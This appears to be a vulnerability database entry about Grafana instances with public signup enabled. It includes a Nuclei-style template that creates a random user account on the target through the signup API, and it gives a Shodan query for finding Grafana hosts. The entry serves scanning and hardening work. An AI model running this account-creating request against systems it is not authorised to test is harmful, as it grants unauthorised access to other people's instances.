grafana-public-signup: Grafana Public Signup

Date: 2025-08-01 | Affected software: Grafana | PoC: public

Vulnerability description

Public (self-service) user signup is enabled on the Grafana instance, so anyone who can reach the web interface can create an account by calling the signup API, without an invitation from an administrator. Signup is controlled by the allow_sign_up option in the [users] section of grafana.ini (false by default); it should stay false unless self-registration is intended. The template below is intrusive: a successful match means it really did create a user with a random username and password on the target, and that account should be removed afterwards. If verify_email_enabled is also on, step 2 of the signup flow expects an email verification code, so this request will fail even though signup is enabled; a negative result therefore does not prove signup is disabled.

PoC code [public]

id: grafana-public-signup

info:
  name: Grafana Public Signup
  author: pdteam
  severity: medium
  description: Public Signup is enabled on Grafana.
  classification:
    cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query: title:"Grafana"
  tags: grafana,intrusive,misconfig,vuln

http:
  - raw:
      - |
        POST /api/user/signup/step2 HTTP/1.1
        Host: {{Hostname}}
        content-type: application/json
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {"username":"{{randstr}}","password":"{{randstr_1}}"}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "User sign up completed successfully"

      - type: word
        words:
          - "grafana_sess"
          - "grafana_user"
        condition: and
        part: header

      - type: status
        status:
          - 200
# digest: 490a0046304402207bdb050a0c68124bc27d87ff61e777eb137228c700cabddf7a572b7357b700480220756f3f49dfdb7472d59a2ab21b10530ad659a806b44dcfb913363e01a5a5cc86:922c64590222798bb761d5b6d8e72950
